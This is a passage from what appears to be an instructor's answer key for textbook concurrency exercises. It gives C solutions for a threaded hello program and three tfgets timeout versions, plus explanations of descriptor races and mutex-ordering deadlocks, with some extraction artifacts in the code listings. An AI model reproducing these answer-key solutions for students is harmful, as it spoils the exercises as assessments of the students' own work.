Solution outline: Install the SIG\_IGN handler for SIGPIPE, and write a wrapper function rio\_writenp that returns 0 when it encounters an EPIPE error. To be more efficient, Tiny can check the return code after each write and return to the main routine when it gets a zero.

# 1.13 Chapter 13: Concurrency

## **Problem 13.12 Solution:**

This purpose of this problem is get the student's feet wet with a simple threaded program.

code/conc/hellon-ans.c

```
1 #include "csapp.h"
3 void *thread(void *vargp);
5 int main(int argc, char **argv)
6 {
       pthread_t *tid;
7
8
       int i, n;
9
       if (argc != 2) {
10
           fprintf(stderr, "usage: %s <nthreads>\n", argv[0]);
           exit(0);
12
13
      n = atoi(argv[1]);
14
       tid = Malloc(n * sizeof(pthread_t));
15
16
       for (i = 0; i < n; i++)
17
18
           Pthread_create(&tid[i], NULL, thread, NULL);
19
       for (i = 0; i < n; i++)
           Pthread_join(tid[i], NULL);
20
       exit(0);
21
```

```
22 }
23
24 /* thread routine */
25 void *thread(void *vargp)
26 {
27     printf("Hello, world!\n");
28     return NULL;
29 }
```

\_\_\_\_\_code/conc/hellon-ans.c

#### **Problem 13.13 Solution:**

This is the student's first introduction to the many synchronization problems that can arise in threaded programs.

- A. The problem is that the main thread calls exit without waiting for the peer thread to terminate. The exit call terminates the entire process, including any threads that happen to be running. So the peer thread is being killed before it has a chance to print its output string.
- B. We can fix the bug by replacing the exit function with either pthread\_exit, which waits for outstanding threads to terminate before it terminates the process, or pthread\_join which explicitly reaps the peer thread.

## **Problem 13.14 Solution:**

No solution yet.

## **Problem 13.15 Solution:**

No solution yet.

#### **Problem 13.16 Solution:**

Each of the Rio functions is passed a pointer to a buffer, and then operates exclusively on this buffer and local stack variables. If they are invoked properly by the calling function, such that none of the buffers are shared, then they are reentrant. This is a good example of the class of implicit reentrant functions.

## **Problem 13.17 Solution:**

The echo\_cnt function is thread-safe because (a) It protects accesses to the shared global byte\_cnt with a mutex, and (b) All of the functions that it calls, such as rio\_readline and rio\_writen, are thread-safe. However, because of the shared variable, echo\_cnt is not reentrant.

#### **Problem 13.18 Solution:**

The problem occurs because you must close the same descriptor twice in order to avoid a memory leak. Here is the deadly race: The peer thread that closes the connection completes the first close operation, thus freeing up descriptor k, and then is swapped out. A connection request arrives while the main thread is blocked in accept which returns a connected descriptor of k, the smallest available descriptor. The main

thread is swapped out, and the peer thread runs again, completing its second close operation, which closes descriptor k again. When the main thread runs again, the connected descriptor it passes to the peer thread is closed!

#### **Problem 13.19 Solution:**

Interestingly, as long as you lock the mutexes in the correct order, the order in which you release the mutexes has no affect on the deadlock-freedom of the program.

#### **Problem 13.20 Solution:**

Thread 1 holds mutex pairs (a, b) and (a, c) simultaneously, but not mutex pair (b,c), while Thread 2 holds mutex pair (c,b) simultaneously, not the other two. Since the sets are disjoint, there is no deadlock potential, even though Thread 2 locks its mutexes in the wrong order. Drawing the progress graph is a nice visual way to confirm this.

#### **Problem 13.21 Solution:**

- A. Thread 1 holds (a, b) and (a, c) simultaneously. Thread 2 holds (b, c) simultaneously. Thread 3 holds (a, b) simultaneously.
- B. Thread 1 locks all of its mutexes in order, so it is OK. Thread 2 does not violate the lock ordering with respect to (b, c) because it is the only thread that hold this pair of locks simultaneously. Thread 3 locks (b, c) out of order, but this is OK because it doesn't hold those locks simultaneously. However, locking (a,b) out of order is a problem, because Thread 1 also needs to hold that pair simultaneously.
- C. Swapping the P(b) and P(a) statements will break the deadlock.

The next three problems give the students an interesting contrast in concurrent programming with processes, select, and threads.

## **Problem 13.22 Solution:**

A version of tfgets based on processes:

\_\_\_\_\_code/conc/tfgets-proc-ans.c

```
1 #include "csapp.h"
2 #define TIMEOUT 5
3
4 static sigjmp_buf env; /* buffer for non-local jump */
5 static char *str; /* global to keep gcc -Wall happy */
6
7 /* SIGCHLD signal handler */
8 static void handler(int sig)
9 {
10  Wait(NULL);
11  siglongjmp(env, 1);
12 }
13
```

```
14 char *tfgets(char *s, int size, FILE *stream)
15 {
       pid_t pid;
16
17
       str = NULL;
18
19
       Signal(SIGCHLD, handler);
20
21
       if ((pid = Fork()) == 0) { /* child */
22
           Sleep(TIMEOUT);
23
           exit(0);
24
       }
25
       else { /* parent */
26
27
           if (sigsetjmp(env, 1) == 0) {
28
               str = fgets(s, size, stream);
               Kill(pid, SIGKILL);
29
30
               pause();
31
32
           return str;
       }
33
34 }
```

\_\_\_\_\_ code/conc/tfgets-proc-ans.c

# **Problem 13.23 Solution:**

A version of tfgets based on I/O multiplexing:

\_\_\_\_\_code/conc/tfgets-select-ans.c

```
1 #include "csapp.h"
3 #define TIMEOUT 5
5 char *tfgets(char *s, int size, FILE *stream)
6 {
7
       struct timeval tv;
       fd_set rfds;
8
       int retval;
9
10
11
      FD_ZERO(&rfds);
      FD_SET(0, &rfds);
12
13
       /* Wait for 5 seconds for stdin to be ready */
14
       tv.tv\_sec = 5;
15
16
       tv.tv_usec = 0;
       retval = select(1, &rfds, NULL, NULL, &tv);
17
       if (retval)
18
           return fgets(s, size, stream);
19
       else
20
21
           return NULL;
```

22 }

\_\_\_\_\_code/conc/tfgets-select-ans.c

## **Problem 13.24 Solution:**

A version of tfgets based on threads:

\_\_\_\_\_code/conc/tfgets-thread-ans.c

```
1 #include "csapp.h"
2 #define TIMEOUT 5
4 void *fgets_thread(void *vargp);
5 void *sleep_thread(void *vargp);
7 char *returnval; /* fgets output string */
8 typedef struct { /* fgets input arguments */
      char *s;
10
      int size;
      FILE *stream;
12 } args_t;
14 char *tfgets(char *str, int size, FILE *stream)
      pthread_t fgets_tid, sleep_tid;
16
17
      args_t args;
18
19
      args.s = str;
20
      args.size = size;
      args.stream = stdin;
21
      returnval = NULL;
22
      Pthread_create(&fgets_tid, NULL, fgets_thread, &args);
23
      Pthread_create(&sleep_tid, NULL, sleep_thread, &fgets_tid);
25
      Pthread_join(fgets_tid, NULL);
26
      return returnval;
27 }
29 void *fgets_thread(void *vargp)
30 {
31
      args_t *argp = (args_t *)vargp;
      returnval = fgets(argp->s, argp->size, stdin);
      return NULL;
33
34 }
35
36 void *sleep_thread(void *vargp)
37 {
      pthread_t fgets_tid = *(pthread_t *)vargp;
38
39
      Pthread_detach(Pthread_self());
      Sleep(TIMEOUT);
40
41
      pthread_cancel(fgets_tid);
```

87

```
42 return NULL;
43 }
```

\_\_\_\_\_ code/conc/tfgets-thread-ans.c

# **Problem 13.25 Solution:**

No solution yet.

# **Problem 13.26 Solution:**

No solution yet.

# **Problem 13.27 Solution:**

No solution yet.

# **Problem 13.28 Solution:**

No solution yet.

# **Problem 13.29 Solution:**

No solution yet.